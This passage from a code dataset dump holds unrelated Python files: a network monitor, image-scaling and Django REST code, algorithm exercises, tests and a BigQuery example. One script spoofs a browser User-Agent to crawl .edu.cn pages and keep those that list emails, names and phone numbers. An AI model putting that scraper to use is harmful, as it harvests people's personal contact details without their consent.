path.exists(CVP_CONFIG_FILE):\n # Start the main Service\n pS(\"OK\",\"Initial ATD Topo Boot\")\n main()\n with open(CVP_CONFIG_FILE,'w') as tf:\n tf.write(\"CVP_CONFIGURED\\n\")\n pS(\"OK\",\"Completed CVP Configuration\")\n else:\n pS(\"OK\",\"CVP is already configured\")\n else:\n pS(\"INFO\",\"CVP is not present in this topology, preventing future run of cvpUpdater\")\n with open(CVP_CONFIG_FILE,'w') as tf:\n tf.write(\"CVP_CONFIGURED\\n\")\n","sub_path":"labvm/services/cvpUpdater/cvpUpdater.py","file_name":"cvpUpdater.py","file_ext":"py","file_size_in_byte":13864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579450952","text":"# coding=utf-8\nfrom __future__ import division\n__author__ = 'ariwaranosai'\n\nfrom tools.schedule import *\nfrom tools.TrivalEvent import TrivalEvent\nfrom tools import logging\nimport urllib, re\nimport psutil\n\nip_url = \"http://1212.ip138.com/ic.asp\"\nip_re = re.compile(\"\\[([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\]\")\n\nclass Network(TrivalEvent):\n \"\"\" Get Disk's status of Raspberry\n Get Disk's status of Raspberry.\n \"\"\"\n\n @property\n def bytes_sent(self):\n return self.get(\"bytes_sent\")\n\n @property\n def bytes_recv(self):\n return self.get(\"bytes_recv\")\n\n @property\n def errin(self):\n return self.get(\"errin\")\n\n @property\n def errout(self):\n return self.get(\"errout\")\n\n @property\n def ip(self):\n return self.get(\"ip\")\n\n @staticmethod\n def get_ip():\n ip = \"\"\n try:\n req = urllib.urlopen(ip_url)\n s = req.read().decode(\"gb2312\").encode('utf-8')\n ip = ip_re.findall(s)[0]\n except IndexError:\n logging.warning(\"response format unexpected\")\n except 
Exception:\n logging.warning(\"can not get ip\")\n\n return ip\n\n def packed(self):\n (bs, br, ps, pr, errin, errout, dropin, dropout) = psutil.net_io_counters()\n self.set(\"bytes_sent\", bs / 1024 / 1024)\n self.set(\"bytes_recv\", br / 1024 / 1024)\n\n self.set(\"errin\", errin)\n self.set(\"errout\", errout)\n self.set(\"unit\", \"MB\")\n\n ip = self.get_ip()\n self.set(\"ip\", ip)\n\n @repeat(\"NetWork\", 30 * 60, -1)\n def do(self):\n self.packed()\n self.save()\n\n\nexports = [\n {\n \"class\": Network,\n \"delay\": 30 * 60,\n \"msg\": u\"获取网络状态包括公网ip\"\n }\n]\n","sub_path":"local/events/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343183516","text":"import urllib.request as urst\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\n\r\nurl = input('Paste an address here: ')\r\nheader = ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\r\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\r\n 'Chrome/63.0.3239.132 Safari/537.36')\r\n# to build up a header, disguising the end server\r\nopener = urst.build_opener()\r\nopener.addheaders = [header]\r\n\r\n\r\n# to compile a whole bunch of result in a binary string by a function\r\ndef org_string(url):\r\n binary_string = opener.open(url).read()\r\n # print(binary_string) # this is used for testing\r\n return(binary_string)\r\n\r\n''' get all links from parent page by searching its binary string \r\n(1st argument called: binary_string) with REGULAR EXPRESSION\r\n(2nd argument called: re_sentense) and save them in a list represented by a function '''\r\ndef get_links(binary_string, re_sentense):\r\n soup = bs(binary_string, 'html.parser', from_encoding='utf-8')\r\n links_list = [] # local\r\n # if ... 
to distinguish which situation should be applied to which searching mode\r\n for link in soup.findAll({'a', 'div', 'span', 'li'}, {'href': re.compile(re_sentense)}):\r\n try:\r\n links_list.append(link.get('href'))\r\n except:\r\n continue\r\n # print(links_list)\r\n return(links_list)\r\n\r\n''' to filter the links within a list (1st argument called: links_list) by defining \r\na threshold number (2nd argument called: threshold) and the following key words \r\n(3rd argument called: key_words) using this function '''\r\ndef filter(links_list, threshold, *key_words):\r\n target_links = []\r\n relation = []\r\n for link in links_list:\r\n try:\r\n b_data = org_string(link)\r\n num = int()\r\n for kw in key_words:\r\n c = b_data.count(kw.encode())\r\n num = num + c\r\n relation.append(num)\r\n except:\r\n continue\r\n print(relation)\r\n\r\n for i in range(len(relation)):\r\n high_ratio = relation[i]\r\n if high_ratio >= threshold:\r\n target_links.append(links_list[i])\r\n return(target_links)\r\n\r\ndata = org_string(url)\r\n# print(data)\r\nlinks = get_links(data, '^http://.{1,}[.]edu[.]cn/.*/.*')\r\nprint(links)\r\nleft = filter(links, 1, '邮箱', '姓名', '电话', '师') #'科研', '实验', '光', '力', '分子')\r\nprint(left)\r\n\r\n","sub_path":"01_Python_Lecture_Series/py_Scripts_Practice/advance wsp.py","file_name":"advance wsp.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624089611","text":"# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\nclass Solution:\n def moveZeroes(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n # tail = 0\n # for num in nums:\n # if num != 0:\n # nums[tail] = num\n # tail += 1\n # for i in range(tail, len(nums)):\n # nums[i] = 0\n\n # print(moveZeroes([0,1,2,0,4]))\n zeros = 0\n count = 0\n for i in nums:\n if i == 0:\n zeros+=1\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n continue\n nums[i-count] = nums[i]\n for i in range(len(nums)-count,len(nums)):\n nums[i] = 0\n\n print(moveZeroes([0,0,0,1,2,3]))","sub_path":"edgeOfTheOcean/moveZeroes.py","file_name":"moveZeroes.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"420652084","text":"import sys\nimport cv2\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom util import *\nfrom PIL import Image\nfrom skimage.transform import resize\n\n# label\n# 23 0.770336 0.489695 0.335891 0.697559\n# 23 0.185977 0.901608 0.206297 0.129554\n\nwith open('/Users/vng/Documents/yolov3_pytorch/data/coco.names', 'r') as file:\n obj_names = [x.strip() for x in file.readlines()]\n\ndef scale_image(image_path, label_path, img_shape=(416, 416)):\n # img = cv2.imread(image_path)\n # img_arr = letterbox_image(img, (416, 416))\n # cv2.imwrite(\"/Users/vng/Documents/yolov3_pytorch/test/process_image.jpg\", img)\n\n img = np.array(Image.open(image_path))\n h, w, _ = img.shape\n dim_diff = np.abs(h - w)\n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n pad = ((pad1, pad2), (0, 0), (0, 0)) if h <= w else ((0, 0), (pad1, pad2), (0, 0))\n input_img = np.pad(img, pad, 'constant', constant_values=128) / 255.\n padded_h, padded_w, _ = input_img.shape\n input_img = resize(input_img, (*img_shape, 3), mode='reflect')\n\n labels = 
np.loadtxt(label_path).reshape(-1, 5)\n x1 = w * (labels[:, 1] - labels[:, 3] / 2)\n y1 = h * (labels[:, 2] - labels[:, 4] / 2)\n x2 = w * (labels[:, 1] + labels[:, 3] / 2)\n y2 = h * (labels[:, 2] + labels[:, 4] / 2)\n\n x1 += pad[1][0]\n y1 += pad[0][0]\n x2 += pad[1][0]\n y2 += pad[0][0]\n\n labels[:, 1] = ((x1 + x2) / 2) / padded_w\n labels[:, 2] = ((y1 + y2) / 2) / padded_h\n labels[:, 3] *= w / padded_w\n labels[:, 4] *= h / padded_h\n\n show_image(input_img, labels)\n\ndef show_image(img, labels):\n # img = img / 255.0\n # plt.imshow(img[:,:,[2,1,0]])\n h, w, _ = img.shape\n\n fig, ax = plt.subplots(1)\n plt.axis(\"off\")\n ax.imshow(img)\n\n for label in labels:\n obj = obj_names[int(label[0])]\n c_x = label[1] * w\n c_y = label[2] * h\n bb_w = label[3] * w\n bb_h = label[4] * h\n bb_x = c_x - bb_w/2\n bb_y = c_y - bb_h/2\n\n t = ax.text(bb_x, bb_y, obj, fontsize=8)\n t.set_bbox(dict(facecolor='red', alpha=0.5))\n rect = patches.Rectangle((bb_x, bb_y), bb_w, bb_h, linewidth=1.5, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n plt.show()\n\nif __name__ == '__main__':\n scale_image(\"/Users/vng/PycharmProjects/PyTorch-YOLOv3/data/coco/images/train2014/COCO_train2014_000000000094.jpg\",\n \"/Users/vng/PycharmProjects/PyTorch-YOLOv3/data/coco/labels/train2014/COCO_train2014_000000000094.txt\")\n # scale_image(sys.argv[1], sys.argv[2])\n","sub_path":"test/scale_image.py","file_name":"scale_image.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650423589","text":"\nimport sys\nimport numpy as np\nimport pdb\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode\nfrom INapIKModel import INapIKModel\nfrom utils import buildMatrixFromArraysList\n\ndef main(argv):\n v0 = -60.00\n n0 = 0.0008\n t0 = 0.0\n tf = 300.0\n current0 = 0.0\n currentf = 10.0\n dt = 1e-3\n resultsFilename = 'results/integrationINapIKFig4-29.npz'\n\n iSlope = (currentf-current0)/(tf-t0)\n def i(t, iSlope=iSlope):\n return(iSlope*t)\n iNapIKModel = INapIKModel.getHighThresholdInstance(i=i)\n # integrator = ode(iNapIKModel.deriv).set_integrator('vode', max_step=dt)\n integrator = ode(iNapIKModel.deriv).set_integrator('vode')\n\n y0 = [v0, n0]\n integrator.set_initial_value(y0, t0)\n ys = [y0]\n times = [t0]\n currents = [i(t0)]\n\n step = 0\n t = t0\n y = y0\n successfulIntegration = True\n while successfulIntegration and t Character:\n char_data = CharacterData(\n ChassisData(attribute_modifiers={Attributes.MAX_HEALTH: health}))\n return build_character(data=char_data)\n\n\ndef _create_combat_controller(enemy) -> CombatSceneController:\n return cast(CombatSceneController, build_controller(CombatScene([enemy])))\n\n\ndef test_game_over():\n enemy = _create_enemy(10)\n ctl = _create_combat_controller(enemy=enemy)\n\n assert not ctl.scene.is_resolved()\n\n enemy.status.increment_attribute(Attributes.HEALTH, -10)\n assert ctl.scene.is_resolved()\n\n\ndef test_selected_enemy():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is not None\n assert selected_char(ctl.scene.layout) == enemy\n\n simulate_mouse_click(-1000, -1000)\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_enemy_unselected_after_move():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, 
ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is enemy\n\n simulate_key_press('1')\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_reclick_unselects():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n click_on_char(enemy, ctl.scene.layout)\n\n assert selected_char(ctl.scene.layout) is enemy\n\n click_on_char(enemy, ctl.scene.layout)\n assert selected_char(ctl.scene.layout) is None\n\n\ndef test_click_nothing_selects_nothing():\n enemy = _create_enemy(2)\n ctl = _create_combat_controller(enemy)\n assert selected_char(ctl.scene.layout) is None\n\n simulate_mouse_click(-100, -100)\n\n assert selected_char(ctl.scene.layout) is None\n","sub_path":"src/controllers/tests/combat_scene_controller_test.py","file_name":"combat_scene_controller_test.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"29089844","text":"import os\nimport yaml\n\n# Set defaults\ndatabase = dict(\n db_host = 'slurm.server.com',\n db_user = 'username',\n db_pass = 'password',\n db_name = 'acct_database',\n table_assoc = 'slurm_assoc_table',\n table_job = 'slurm_job_table',\n)\n\n# Change to yaml values\nymlfile = None\nif os.path.exists(\"config.yml\"):\n ymlfile = open(\"config.yml\", 'r')\nelif os.path.exists(os.environ['SLURM_REST_API_CONFIG']):\n ymlfile = open(os.environ['SLURM_REST_API_CONFIG'], 'r')\n\nif ymlfile is not None:\n try:\n cfg = yaml.load(ymlfile)\n if cfg is not None and 'database' in cfg:\n for n in cfg['database']:\n database[n] = cfg['database'][n]\n finally:\n ymlfile.close()\n","sub_path":"slurm-rest-api/acctapi/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579438665","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom flask import Blueprint, session, render_template, abort, request, jsonify\nimport mysql.connector\nimport secret\nfrom handler.pet import filterPet\nfrom handler.moment import petsMoment\nfrom handler.message import numNew\n\n\nexplore_routes = Blueprint('explore_routes', __name__, template_folder = 'templates')\nconfig = secret.mysql()\n\n\n#Get explore\n@explore_routes.route('/explore')\ndef exploreHome():\n if session.get('userName') is not None:\n visitorName = session['userName']\n visitorId = session['userId']\n cnx = mysql.connector.connect(**config)\n try:\n num = numNew(visitorId, cnx)\n num = num[0]\n finally:\n cnx.close()\n else:\n visitorName = None\n visitorId = None\n num = None\n return render_template('explore.html', name = visitorName, id = visitorId, num = num)\n\n#load 20 moments\n@explore_routes.route('/explore/getMoment', methods = ['GET', 'POST'])\ndef getMoment():\n #only response to post request\n if request.method == 'POST':\n type = int(request.form['type'])\n nature = int(request.form['nature'])\n load = int(request.form['load']) * 20\n cnx = mysql.connector.connect(**config)\n #get all filter pets\n try:\n pets = filterPet(type, nature, cnx)\n if pets == '0':\n return str(0)\n if len(pets) != 0:\n #Get all pets id in list\n allId = [x[0] for x in pets]\n moments = petsMoment(allId, load, cnx)\n #return 0 for db error\n if moments == '0':\n return str(0)\n #not pets, no moments\n else:\n moments = []\n finally:\n cnx.close()\n return jsonify(moments)\n else:\n 
abort(404)","sub_path":"routes/explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137726923","text":"#!/usr/bin/env python3\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nfrom pathlib import Path\n\nfrom config import configuration\nfrom core.benchmark import Benchmark\nfrom core.utils.charts import star_chart, plot_stacked_bar, plot_heatmap, plot_venn3\nfrom core.utils.results import ToolResults\nfrom core.utils.stream import progress\n\n\nbenchmark = Benchmark(config=configuration, seed=8888)\nbenchmark.verbose = False\nchallenges_count = len(benchmark.challenges)\npatches = {}\n\nfor i, cn in enumerate(benchmark.challenges):\n progress(i+1, challenges_count, suffix=f\"Querying patch for {cn}\")\n patches[cn] = benchmark.patch(cn)\n\nparser = argparse.ArgumentParser(prog=\"compare\", description='Compares tools results')\nparser.add_argument(\"--seed\", type=int, help=\"The seed number of the results\", default=0)\nparser.add_argument(\"--plot\", choices=[\"stacked\", \"star\", \"heatmap\", \"venn\"], required=True,\n type=str, help=\"The seed number of the results\")\ntools_timeout = configuration.tools_timeout\ncolors_list = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'orange', 'gray', 'brown', 'lime', 'tan', 'teal']\n\n\ndef get_tools_results(results_dir: Path, seed_target: int = 0):\n return [ToolResults(tool, tools_timeout, patches, seed_target) for tool in results_dir.iterdir() if tool.is_dir()]\n\n\ndef plot_ranks(scores: List[int], tools: List[str], colors: List[str]):\n axes = plt.gca()\n axes.set_ylim([0, 3])\n y_pos = [i for i in range(len(tools))]\n plt.bar(y_pos, scores, color=colors)\n plt.xticks(y_pos, tools)\n plt.ylabel('Score')\n plt.title('Tools ranking')\n plt.show()\n\n\ndef plot_star(star_data: List[ToolResults], challenges_count: int):\n tools_names = [tool.name for tool in star_data]\n tools_count = len(tools_names)\n tools_metrics = [tool() for tool in star_data]\n tools_results = [list(metrics.values()) for metrics in tools_metrics]\n spoke_labels = [list(metrics.keys()) for metrics in tools_metrics]\n\n star_chart(tools_results, spoke_labels=spoke_labels[0], colors=colors_list[:tools_count], labels=tools_names,\n title=f\"{tools_count} tools' profiling on {challenges_count} challenges with {len(spoke_labels[0])} metrics.\")\n\n\ndef plot_stacked(data: List[List[float]], series_labels: List[str], category_labels: List[str]):\n labels_count = len(series_labels)\n colors = colors_list[:labels_count]\n print(data)\n plot_stacked_bar(\n data,\n series_labels,\n category_labels=category_labels,\n show_values=True,\n value_format=\"{:.1f}\",\n colors=colors,\n y_label=\"Score\"\n )\n\n plt.savefig('bar.png')\n plt.show()\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n# scores = get_scores(args.seed)\n# print(scores)\n #challenges = benchmark.get_challenges()\n# ranks = [sum(score)/len(challenges) for score in scores.values()]\n# plot_ranks(ranks, list(scores.keys()), ['red', 'green', 'yellow'])\n results_path = configuration.paths.out_dir\n results = get_tools_results(results_path, args.seed)\n if args.plot == \"star\":\n plot_star(results, 69)\n elif args.plot == \"stacked\":\n tools_names = [tool.name for tool in results]\n tools_performance = [tool.performance() for tool in results]\n print(tools_performance)\n performance_labels = [list(tp.keys()) for tp in 
tools_performance]\n plot_stacked(data=np.transpose([list(tp.values()) for tp in tools_performance]), series_labels=performance_labels[0],\n category_labels=tools_names)\n elif args.plot == \"heatmap\":\n tools_names = [tool.name for tool in results]\n challenges_names = [[cr.path.parent.name for cr in tool.challenge_results] for tool in results]\n tools_fix_score = [[cr.metrics.fix_score for cr in tool.challenge_results] for tool in results]\n plot_heatmap(matrix=tools_fix_score, x_labels=challenges_names[0], y_labels=tools_names,\n title=\"Fixed challenges heatmap\")\n elif args.plot == \"venn\":\n tools_names = tuple(tool.name for tool in results)\n tools_results = tuple(set(cr.path.parent.name for cr in tool.challenge_results if cr.stats.fix) for tool in results)\n plot_venn3(subsets=tools_results, labels=tools_names)\n","sub_path":"scripts/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236030531","text":"class Stack(object):\n def __init__(self):\n self._list = []\n\n def __str__(self):\n return str(self._list)\n\n def __len__(self):\n return len(self._list)\n\n def push(self, item):\n self._list.append(item)\n\n def pop(self):\n try:\n return self._list.pop()\n except IndexError:\n raise IndexError('pop from empty stack')\n\n def peek(self):\n try:\n return self._list[-1]\n except IndexError:\n raise IndexError('peek into empty stack')\n\n\ndef main():\n st = Stack()\n\n # Push and print\n for i in range(10):\n st.push(i)\n print(st)\n st.push('Hello World')\n print(st)\n\n # Get size\n print(len(st))\n\n # Pop\n print(st.pop())\n print(st)\n\n # Peek\n print(st.peek())\n print(st)\n\n # Exceptions\n while len(st): # Empty the stack\n st.pop()\n try:\n st.peek()\n except Exception as e:\n print('Exception: {0}'.format(e))\n try:\n st.pop()\n except Exception as e:\n print('Exception: {0}'.format(e))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49667347","text":"import random\nfrom collections import deque\nfrom math import sqrt, ceil\n\nclass User:\n def __init__(self, name):\n self.name = name\n\ndef fisher_yates_shuffle(l):\n for i in range(0, len(l)):\n random_index = random.randint(i, len(l) - 1)\n l[random_index], l[i] = l[i], l[random_index]\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The 
number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n for name in range(num_users):\n self.add_user(name)\n\n # Create friendships (refer to diagram for this algorithm)\n\n # All possible friendship ID's in a group of 5:\n # 5 4 3 2\n # +-----------\n # 1 | 1 2 4 7\n # 2 | 3 5 8 \n # 3 | 6 9\n # 4 | 10\n #\n # use a random selection from 1 - 10\n # use math to figure out the corresponding coordinates\n\n # Duplications are prevented by only choosing friends with lower IDs\n num_friendships = num_users * avg_friendships // 2\n # there are a 'triangle' number of possible friendships, we can ID them all\n num_possible = (num_users - 1) * num_users // 2\n # pick a random sample\n for friendship_id in random.sample(range(1, num_possible + 1), num_friendships):\n reverse_triangle = (sqrt(8 * friendship_id + 1) - 1) / 2\n rounded = ceil(reverse_triangle)\n # get the first triangle number greater or equal to friendship_id\n next_highest_triangle = (rounded + 1) * rounded // 2\n # the difference tells us what two friends the id corresponds to\n difference = next_highest_triangle - friendship_id\n first_friend = rounded - difference\n second_friend = num_users - difference\n self.add_friendship(first_friend, second_friend)\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n visited = {} # Note that this is a dictionary, not a set\n\n # Stores the next neighbors to add, and also the node one level closer\n # in order to concatenate a path \n q = deque()\n q.append((user_id, None))\n while len(q) > 0:\n user, prev = q.popleft()\n # write the path for the current user\n visited[user] = visited[prev] + [user] if prev is not None else [user]\n for neighbor in self.friendships[user]:\n if neighbor not in visited:\n q.append((neighbor, user))\n\n return visited\n\nif __name__ == '__main__':\n # sg = SocialGraph()\n # sg.populate_graph(10, 2)\n # print(sg.friendships)\n # connections = sg.get_all_social_paths(1)\n # print(connections)\n\n # question 1 and 2:\n q1_results = []\n q2_results = []\n for _ in range(1000):\n sg = SocialGraph()\n sg.populate_graph(1000, 5)\n network = sg.get_all_social_paths(1)\n network_count = len(network) - 1 # exclude self\n if network_count == 0:\n # slim chance this can happen\n continue\n \n degree_of_separation = 0\n for person in network.items():\n if person[0] != 1: # exclude self\n degree_of_separation += len(person[1]) - 1\n degree_of_separation /= network_count\n \n q1_results.append(network_count / 999)\n q2_results.append(degree_of_separation)\n\n print(\"Q1: percent of users in extended network\")\n print(sum(q1_results) / len(q1_results))\n print(\"Q2: average degree of separation\")\n print(sum(q2_results) / len(q2_results))\n\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387593230","text":"from view.commons.commons import Commons\nfrom view.commons.decode_commons import DecodeCommons\nfrom datetime import datetime\nfrom lib.file import File\nimport os\n\nscript_dir = os.path.dirname(__file__) \nrel_path = \"../../../examples/\"\nabs_file_path = 
os.path.join(script_dir, rel_path)\n\n\nclass DecodeView:\n def __init__(self,):\n super(DecodeView, self).__init__()\n\n def handle_decode_action(self, file_path: str, *args):\n file_extension = file_path.split(\"/\")[-1].split(\".\")[-1] == \"greed_compressed\"\n \n if not file_extension:\n self.show_popup(\"Não foi possível abrir o arquivo selecionado\", \"Verifique se você escolheu um arquivo no formato .greed_compressed!!\")\n return\n\n try:\n file = Commons.get_file(file_path=file_path, encode_type='rb')\n except Exception as ex:\n self.show_popup(\"Não foi possível abrir o arquivo selecionado\", \"Verifique se você escolheu um arquivo no formato .greed_compressed!!\")\n return\n\n decoded_text = DecodeCommons.get_decoded_text(file)\n\n decoded_content_path = abs_file_path + self.get_file_extension(file_path) + datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\") + \".txt\"\n\n decoded_file_path = os.path.join(decoded_content_path)\n\n File.save_file(decoded_file_path, file_content=decoded_text, type='wt')\n\n self.show_popup(\"Arquivo descomprimido com sucesso!!\", \"Você pode vê-lo na pasta:\", decoded_file_path)\n\n def get_file_extension(self, file_path: str) -> str:\n return file_path.split(\"/\")[-1].split(\".\")[0]","sub_path":"view/gui/decode/decode_view.py","file_name":"decode_view.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185249609","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom .serializers import TaskSerializer\nfrom .models import Task\n\n\n# Create your views here.\n\n\n\n# ## Using this \"get_object_or_404( model_name, pk=primary_key_argument )\" \n# ## is equivalent to this following code.\n\n# from django.http import Http404\n\n# def my_view(request):\n# try:\n# obj = MyModel.objects.get(pk=1)\n# except MyModel.DoesNotExist:\n# raise Http404(\"No MyModel matches the given query.\")\n\n\n\ndef basic_json_response(request):\n return JsonResponse(\"This is a basic JSON Response\", safe=False)\n\n\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n\t\t'List':'http://127.0.0.1:8080/api/task-list/',\n\t\t'Detail View':'http://127.0.0.1:8080/api/task-detail//',\n\t\t'Create':'http://127.0.0.1:8080/api/task-create/',\n\t\t'Update':'http://127.0.0.1:8080/api/task-update//',\n\t\t'Delete':'http://127.0.0.1:8080/api/task-delete//',\n\t}\n\n return Response(api_urls)\n\n\n@api_view(['GET'])\ndef taskList(request):\n tasks = Task.objects.all() \n serializer = TaskSerializer(tasks, many=True) ## [\"many=True\"] only when many reords are to be fetched.\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n@api_view(['GET'])\ndef taskDetail(request, pk):\n # task_detail = Task.objects.get(id=pk)\n task_detail = get_object_or_404(Task, pk=pk) ## This will not show any error, instead, it will show a sweet \"{ \"detail\": \"Not found.\" }\" as Response (and that too in JSON Format).\n serializer = TaskSerializer(task_detail, many=False) ## [\"many=True\"] when only on single record is to be fetched.\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n\n@api_view(['GET'])\ndef taskDelete(request, pk):\n # task = Task.objects.get(id=pk) ## This works well but it produces an \"Django Error Message Page\" which is not likely.\n task = get_object_or_404(Task, pk=pk) ## 
This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n task.delete()\n\n delete_response_message = {\n # 'delete-message' : 'Item Successfully Deleted!!',\n 'delete-status' : 'success'\n }\n\n return Response(delete_response_message)\n\n\n\n@api_view(['POST'])\ndef taskCreate(request):\n serializer = TaskSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n\n\n@api_view(['PUT']) # We can also used \"POST\" request also (like, @api_view(['POST'])) and this would also work, but to make it purely for 'updating' purpose, 'PUT' is more suitable.\ndef taskUpdate(request, pk): ## The \"UPDATE\" means that the whole row(record) in the database is to be changed.\n task = Task.objects.get(pk=pk)\n # task = get_object_or_404(Task, pk=pk) ## This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n serializer = TaskSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n\n@api_view(['PATCH']) # We can also used \"POST\" request also (like, @api_view(['POST'])) and this would also work, but to make it purely for 'updating some specific fields only and not affecting the other fields', 'PATCH' is more suitable option.\ndef taskPatch(request, pk): ## The \"PATCH\" means the data of some particular field(s) is to be changed.\n # task = Task.objects.get(pk=pk) \n task = get_object_or_404(Task, pk=pk) ## This does not display the error page, instead, it shows \"{ \"details\": \"Not found\" } as Response in JSON Format.\n serializer = TaskSerializer(task, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n\n serialized_data = serializer.data\n\n return Response(serialized_data)\n\n","sub_path":"todo_drf_api-main-working/todo_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549288967","text":"from google.cloud import bigquery_datatransfer\n\ntransfer_client = bigquery_datatransfer.DataTransferServiceClient()\n\n# The project where the query job runs is the same as the project\n# containing the destination dataset.\nproject_id = \"testing-123-301507\"\ndataset_id = \"sample_data\"\n\n# This service account will be used to execute the scheduled queries. 
Omit\n# this request parameter to run the query as the user with the credentials\n# associated with this client.\nservice_account_name = \"sample-linux@testing-123-301507.iam.gserviceaccount.com\"\n\n# Use standard SQL syntax for the query.\nquery_string = \"\"\"\nSELECT\n CURRENT_TIMESTAMP() as current_time,\n @run_time as intended_run_time,\n @run_date as intended_run_date,\n 17 as some_integer\n\"\"\"\n\nparent = transfer_client.common_project_path(project_id)\n\ntransfer_config = bigquery_datatransfer.TransferConfig(\n destination_dataset_id=dataset_id,\n display_name=\"Your Scheduled Query Name\",\n data_source_id=\"scheduled_query\",\n params={\n \"query\": query_string,\n \"destination_table_name_template\": \"mascots{20210115}\",\n \"write_disposition\": \"WRITE_TRUNCATE\",\n \"partitioning_field\": \"\",\n },\n schedule=\"every 24 hours\",\n)\n\ntransfer_config = transfer_client.create_transfer_config(\n bigquery_datatransfer.CreateTransferConfigRequest(\n parent=parent,\n transfer_config=transfer_config,\n service_account_name=service_account_name,\n )\n)\n\nprint(\"Created scheduled query 